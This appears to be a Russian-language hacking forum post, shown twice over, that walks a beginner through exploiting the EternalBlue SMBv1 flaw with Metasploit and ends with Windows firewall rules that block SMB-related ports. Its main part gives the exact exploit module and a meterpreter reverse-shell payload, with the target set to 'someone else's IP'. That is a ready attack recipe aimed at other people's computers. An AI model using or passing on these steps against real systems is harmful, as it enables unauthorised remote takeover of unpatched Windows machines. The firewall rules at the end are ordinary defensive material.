NURLAN
Гость
N
NURLAN
Гость
Всем здравствуйте! Не судите строго,это моя первая тема. Сегодня я буду рассказывать про EternalBLUE Exploit.
Небольшой рассказ:
EternalBLUE это эксплоит который иcпользует уязвимость smb v1.o и аттакует порт 445.
На последних версиях Metasploit Framework данный Exploit со сканером уже имеется.
Для эксплоутации я буду использовать дедик Amazon Kali, P.S. лавку прикрыли и дедики уже бесплатно нельзя создавать. После того как мы скачали Kali Linux 2017 мы пишем команду msfconsole.Посмотреть вложение 1305
Ждем...
Когда загрузится будет так:Посмотреть вложение 1306
Дальше проверяем наличимость данного эскплоита.
Посмотреть вложение 1307
Далее пишем команду: use exploit/windows/smb/ms17_010_eternalblue
Посмотреть вложение 1308
далее пишем:set payload windows/x64/meterpreter/reverse_tcp
set lhost ваш_ip
set rhost чужой_ip
run
И после команды run эксплоит запустится.
P.P.S я сейчас не взламывал комп,ибо мне лень.
P.P.P.S. вирус WannaCry использовал именно данный эксплоит.
Как пофиксить:
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name="Block_TCP-135"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name="Block_TCP-137"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name="Block_TCP-138"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name="Block_TCP-139"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name="Block_TCP-445"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name="Block_TCP-5000"
Небольшой рассказ:
EternalBLUE это эксплоит который иcпользует уязвимость smb v1.o и аттакует порт 445.
На последних версиях Metasploit Framework данный Exploit со сканером уже имеется.
Для эксплоутации я буду использовать дедик Amazon Kali, P.S. лавку прикрыли и дедики уже бесплатно нельзя создавать. После того как мы скачали Kali Linux 2017 мы пишем команду msfconsole.Посмотреть вложение 1305
Ждем...
Когда загрузится будет так:Посмотреть вложение 1306
Дальше проверяем наличимость данного эскплоита.
Посмотреть вложение 1307
Далее пишем команду: use exploit/windows/smb/ms17_010_eternalblue
Посмотреть вложение 1308
далее пишем:set payload windows/x64/meterpreter/reverse_tcp
set lhost ваш_ip
set rhost чужой_ip
run
И после команды run эксплоит запустится.
P.P.S я сейчас не взламывал комп,ибо мне лень.
P.P.P.S. вирус WannaCry использовал именно данный эксплоит.
Как пофиксить:
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name="Block_TCP-135"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name="Block_TCP-137"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name="Block_TCP-138"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name="Block_TCP-139"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name="Block_TCP-445"
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name="Block_TCP-5000"
